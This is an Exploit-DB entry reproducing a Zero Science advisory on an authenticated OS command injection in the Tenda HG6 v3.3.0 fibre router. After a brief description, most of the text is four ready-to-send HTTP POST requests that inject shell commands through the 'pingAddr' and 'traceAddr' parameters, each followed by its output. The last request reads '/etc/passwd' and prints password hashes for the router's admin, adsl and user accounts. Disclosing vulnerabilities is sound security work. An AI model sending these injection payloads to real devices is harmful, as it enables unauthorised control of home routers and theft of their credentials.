Tenda HG6 v3.3.0 - Remote Command Injection

EDB-ID:

50916

CVE:

N/A




Platform:

Hardware

Date:

2022-05-11


# Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection
# Exploit Author: LiquidWorm

Tenda HG6 v3.3.0 Remote Command Injection Vulnerability


Vendor: Tenda Technology Co.,Ltd.
Product web page: https://www.tendacn.com
                  https://www.tendacn.com/product/HG6.html
Affected version: Firmware version: 3.3.0-210926
                  Software version: v1.1.0
                  Hardware Version: v1.0
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
a voice port to meet users' requirements for enjoying the Internet,
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5706
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php


22.04.2022

--


ping.asp:
---------

POST /boaform/formPing HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---
TZ
app.gwdt
bftpd.conf
buildtime
check_version.txt
config
config.csv
config_default.xml
config_default_hs.xml
dhclient-script
dnsmasq.conf
ethertypes
factory_default.xml
ftpdpassword
group
hardversion
inetd.conf
init.d
inittab
innversion
insdrv.sh
irf
mdev.conf
omci_custom_opt.conf
omci_ignore_mib_tbl.conf
omci_ignore_mib_tbl_10g.conf
omci_mib.cfg
orf
passwd
ppp
profile
protocols
radvd.conf
ramfs.img
rc_boot_dsp
rc_voip
release_date
resolv.conf
rtk_tr142.sh
run_customized_sdk.sh
runoam.sh
runomci.sh
runsdk.sh
samba
scripts
services
setprmt_reject
shells
simplecfgservice.xml
smb.conf
softversion
solar.conf
solar.conf.in
ssl_cert.pem
ssl_key.pem
version
wscd.conf


ping6.asp:
----------

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---
boa.conf
web


tracert.asp:
------------

POST /boaform/formTracert HTTP/1.1
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---
/home/httpd


tracert6.asp:
-------------

POST /boaform/formTracert6 HTTP/1.1
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
nobody:x:0:0::/tmp:/dev/null
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh